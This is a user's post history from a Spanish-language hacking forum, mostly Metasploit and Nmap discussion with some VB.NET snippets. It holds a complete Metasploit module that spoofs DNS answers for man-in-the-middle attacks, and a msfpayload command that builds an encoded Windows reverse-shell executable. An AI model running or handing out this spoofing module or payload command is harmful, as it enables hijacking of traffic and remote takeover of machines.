Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Shell Root

#3411
Hacking / Re: Ayuda Nmap y Metasploit
24 Febrero 2010, 22:01 PM
Cita de: rockernault en 24 Febrero 2010, 21:26 PMme referia a que es una tonteria...  MiTM no es una vulnerabilidad...
Es verdad... tan solo es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado...

Tal vez si los paquetes fuesen "Archivos", se modificarian por algun PAYLOAD




PD: fakedns.rb, responde a cualquier consulta DNS con una respuesta falsa apuntando a una dirección IP específica.
Código (ruby) [Seleccionar]
##
# $Id: fakedns.rb 5540 2008-06-25 23:04:19Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'
require 'resolv'

module Msf

class Auxiliary::Server::MITM_FakeDNS < Msf::Auxiliary

include Auxiliary::Report

def initialize
super(
'Name'        => 'MITM DNS Service',
'Version'     => '$Revision: 5540 $',
'Description'    => %q{
  This hack of the metasploit fakedns.rb serves as a sort
  of MITM DNS server.  Requests are passed through to a real
  DNS server, and the responses are modified before being
  returned to the client, if they match regular expressions
  set in FILENAME.
},
'Author'      => ['ddz', 'hdm', 'Wesley McGrew <wesley@mcgrewsecurity.com>'],
'License'     => MSF_LICENSE,
'Actions'     =>
[
[ 'Service' ]
],
'PassiveActions' =>
[
'Service'
],
'DefaultAction'  => 'Service'
)

register_options(
[
OptAddress.new('SRVHOST',   [ true, "The local host to listen on.", '0.0.0.0' ]),
OptPort.new('SRVPORT',      [ true, "The local port to listen on.", 53 ]),
# W: Added in an option for a set of filters, took out the catchall TARGETHOST
OptAddress.new('REALDNS', [true,"Ask this server for answers",nil]),
OptString.new('FILENAME', [true,"File of ip,regex for filtering responses",nil])
], self.class)
end


def run

begin
  fp = File.new(datastore['FILENAME'])
rescue
  print_status "Could not open #{datastore['FILENAME']} for reading.  Quitting."
    return
end
mod_entries = []
while !fp.eof?
    entry = fp.gets().chomp().split(',')
    mod_entries.push([entry[0],Regexp.new(entry[1])])
  end


@port = datastore['SRVPORT'].to_i

    # MacOS X workaround
    ::Socket.do_not_reverse_lookup = true
           
    @sock = ::UDPSocket.new()
    @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
    @sock.bind(datastore['SRVHOST'], @port)
    @run = true

Thread.new {
# Wrap in exception handler
  begin

        while @run
          packet, addr = @sock.recvfrom(65535)
          if (packet.length == 0)
              break
          end

          request = Resolv::DNS::Message.decode(packet)
         
   
          # W: Go ahead and send it to the real DNS server and
          #    get the response
          sock2 = ::UDPSocket.new()
          sock2.send(packet, 0, datastore['REALDNS'], 53) #datastore['REALDNS'], 53)
          packet2, addr2 = sock2.recvfrom(65535)
          sock2.close()
                   
         
          real_response = Resolv::DNS::Message.decode(packet2)
          fake_response = Resolv::DNS::Message.new()
         
          fake_response.qr = 1 # Recursion desired
          fake_response.ra = 1 # Recursion available
          fake_response.id = real_response.id
         
          real_response.each_question { |name, typeclass|
            fake_response.add_question(name, typeclass)
          }
         
          real_response.each_answer { |name, ttl, data|
            replaced = false
            mod_entries.each { |e|
              if name.to_s =~ e[1]
                case data.to_s
                when /IN::A/
                  data = Resolv::DNS::Resource::IN::A.new(e[0])
                  replaced = true
                when /IN::MX/
                  data = Resolv::DNS::Resource::IN::MX.new(10,Resolv::DNS::Name.create(e[0]))
                  replaced = true
                when /IN::NS/
                  data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0]))
                  replaced = true
                when /IN::PTR/
                  # Do nothing
                  replaced = true
                else
                  # Do nothing
                  replaced = true
                end
              end
              break if replaced
            }
            fake_response.add_answer(name,ttl,data)
          }
         
          real_response.each_authority { |name, ttl, data|
            mod_entries.each { |e|
              if name.to_s =~ e[1]
                data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0]))
                break
              end
            }
            fake_response.add_authority(name,ttl,data)
          }
         
          response_packet = fake_response.encode()
         
          @sock.send(response_packet, 0, addr[3], addr[1])
        end

# Make sure the socket gets closed on exit
  rescue ::Exception => e
  print_error("fakedns: #{e.class} #{e} #{e.backtrace}")
  ensure
  @sock.close
  end

}

end

end
end
#3412
Hacking / Re: Ayuda Nmap y Metasploit
24 Febrero 2010, 21:22 PM
Cita de: rockernault en 24 Febrero 2010, 21:08 PMque opinas Shell Root??
:silbar:




Bueno, xD, ando de nuevo retirado, ocupaciones como "Desarrollador de Software", quitan demasiado tiempo. Así, solo diré...

"Una vulnerabilidad es tan limitada como tu quieras que sea"

y... [Ettercap] And [Metasploit], hacen una gran pareja! :D
#3413
Foro Libre / Re: ¿Que estas escuchando?
24 Febrero 2010, 07:13 AM
Polvo en el Viendo de Kansas

[youtube=425,350]http://www.youtube.com/watch?v=d8bZU8UW0tI[/youtube]
#3414
Código (vbnet) [Seleccionar]
Option Explicit On
Option Strict On

Imports System.Text.RegularExpressions

Public Class Form1

    Private Sub Buscar_Coincidencia( _
        ByVal pattern As String, _
        ByVal RichTextBox As RichTextBox, _
        ByVal cColor As Color, _
        ByVal BackColor As Color)


        Dim Resultados As MatchCollection
        Dim Palabra As Match

        Try
            ' PAsar el pattern e indicar que ignore las mayúsculas y minúsculas al mosmento de buscar
            Dim obj_Expresion As New Regex(pattern.ToString, RegexOptions.IgnoreCase)

            ' Ejecutar el método Matches para buscar la cadena en el texto del control
            ' y retornar un MatchCollection con los resultados
            Resultados = obj_Expresion.Matches(RichTextBox.Text)

            ' quitar el coloreado anterior
            With RichTextBox
                .SelectAll()
                .SelectionColor = Color.Black
            End With

            ' Si se encontraron coincidencias recorre las colección 
            For Each Palabra In Resultados
                With RichTextBox
                    .SelectionStart = Palabra.Index ' comienzo de la selección
                    .SelectionLength = Palabra.Length ' longitud de la cadena a seleccionar
                    .SelectionColor = cColor ' color de la selección
                    .SelectionBackColor = BackColor
                    Debug.Print(Palabra.Value)
                End With
            Next Palabra

        Catch ex As Exception
            MsgBox(ex.Message.ToString)
        End Try

    End Sub

    Private Sub Button1_Click( _
        ByVal sender As System.Object, _
        ByVal e As System.EventArgs) Handles Button1.Click
        ' pasar el pattern, el Richtext, y los colores para el resalte
        Buscar_Coincidencia(TextBox1.Text, RichTextBox1, Color.Blue, Color.Yellow)

    End Sub
End Class

Fuente: :http://www.recursosvisualbasic.com.ar/htm/vb-net/9-richtextobx-highlight-color-en-vb-net.htm
#3415
FileStream.Lock (Método): Evita que otros procesos cambien FileStream permitiendo al mismo tiempo el acceso de lectura.




CitarPuedes renombrerlo,cambiar ubicación y extención.
Name "c:\x.txt" As "c:\Windows\System\xfx.dll"
Fuente: :http://www.canalvisualbasic.net/foro/visual-basic-6-0/bloquear-archivos-para-que-no-puedan-ser-leidos-5204/
#3416
Hacking / Re: Encoders de Metasploit
23 Febrero 2010, 19:00 PM
Lo dudo alexkof158, ya que estamos refiriendonos a un Ejecutable. Mirad...
shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe
En la siguiente cadena, nos referimos a un Archivo Ejecutable
shell@Alex:~/msf3$  [...] exe > /home/shellroot/Archivo_Codificado1.exe
#3417
Hacking / Re: metasploit para vista
23 Febrero 2010, 18:58 PM
El Nessus dá la referencia de la vulnerabilidad, intentad realizando un Search Nombre_Vulnerabilidad. Y con respecto tu primera duda, mirad que no pudó encontrar el Lenguaje del Sistema.
Fingerprint: Windows Vista Home Premium Service Pack 2 - lang:Unknown

Mirad http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html
#3418
Hacking / Re: Ayuda Nmap y Metasploit
23 Febrero 2010, 18:55 PM
Que tal neuronass, veo que esta OPEN el microsoft-ds, pero para estár aun más seguros, intentad escanearlo con el Nessus!




togueter, WTF!
#3419
Cita de: Yoyahack en 21 Febrero 2010, 22:34 PMes javascript y javascript se ejecuta al lado del cliente/navegador, al intertar leerlo el navegador interpretara que es javascript y lo ejecuta, otra cosa no es en el texto de una imagen porque no es una imagen como todos creen.
WTF!, entonces es posible la ejecucion de codigo arbitrario, dentro del texto de la supuesta "imagen"
#3420
.NET (C#, VB.NET, ASP) / Re: Ado.net
20 Febrero 2010, 23:36 PM